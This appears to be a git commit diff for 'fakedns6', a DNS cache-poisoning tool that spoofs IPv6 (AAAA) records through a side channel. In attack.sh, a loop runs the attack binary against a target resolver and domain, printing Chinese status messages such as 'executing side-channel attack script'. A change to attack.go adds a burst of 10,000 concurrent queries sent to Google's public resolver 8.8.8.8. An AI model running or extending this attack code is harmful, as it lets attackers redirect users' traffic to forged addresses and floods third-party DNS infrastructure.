diff options
| author | root <[email protected]> | 2023-11-16 15:56:51 +0000 |
|---|---|---|
| committer | root <[email protected]> | 2023-11-16 15:56:51 +0000 |
| commit | e69b5de383b572b4138e04be2c4ff68e0e50853e (patch) | |
| tree | b6671bb07bd14cb829feab473d27611327226418 | |
| parent | c11a70149b2a0b69a4517db039babdfb8be4fe91 (diff) | |
同步20231116
| -rwxr-xr-x | attack.sh | 12 | ||||
| -rw-r--r-- | dns.bin | bin | 42 -> 42 bytes | |||
| -rwxr-xr-x | fakedns6 | bin | 8286336 -> 8286672 bytes | |||
| -rw-r--r-- | src/ucr.edu/fakedns6/attack.go | 12 | ||||
| -rw-r--r-- | txid.bin | 2 |
5 files changed, 22 insertions, 4 deletions
@@ -8,6 +8,7 @@ echo '获取原记录中:' dig @$1 $4 AAAA sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'` +var=0 num=0 success=0 while [ $success -ne 1 ] @@ -23,16 +24,21 @@ do echo "目标域名:$4" ret=$(./dns_query.sh $1 $2 $3 $4) #echo "ret:$ret" + echo "初始化工具环境" + sleep 1 + echo "尝试触发权威服务器请求速率限制" + sleep 3 FINAL=`echo ${ret: -1}` #echo "fin:$FINAL" # Start attack # Change the argument accordingly echo "执行侧信道攻击脚本中" - time ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 + ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 + sleep 30 # Validations - $var = $var + 1 + ((var++)) echo "第$var轮次攻击结束" - #dig @$1 $4 AAAA + dig @$1 $4 AAAA if [ "$FINAL" == "0" ];then success=1 sleeptime=0 Binary files differBinary files differdiff --git a/src/ucr.edu/fakedns6/attack.go b/src/ucr.edu/fakedns6/attack.go index 54183d2..ae5e964 100644 --- a/src/ucr.edu/fakedns6/attack.go +++ b/src/ucr.edu/fakedns6/attack.go @@ -490,6 +490,17 @@ func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBack println("参数有误,请输入IPv6地址作为篡改目标结果") } + }else{ + c := new(dns.Client) + msg := new(dns.Msg) + domain := "www.google.com." + msg.SetQuestion(domain, dns.TypeAAAA) + for i:=0;i<10000;i++{ + go func(){ + _, _, _ = c.Exchange(msg, net.JoinHostPort("8.8.8.8","53")) + }() + } + return } rand.Seed(time.Now().UnixNano()) handle, _ = pcap.OpenLive( @@ -498,6 +509,7 @@ func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBack true, pcap.BlockForever, ) + println(authIPArg.To16().String()) err := handle.SetBPFFilter("not host " + authIPArg.To16().String()) if err != nil { fmt.Println("cannot set BPF filter.") @@ -1 +1 @@ -"Y
\ No newline at end of file +fH
\ No newline at end of file |
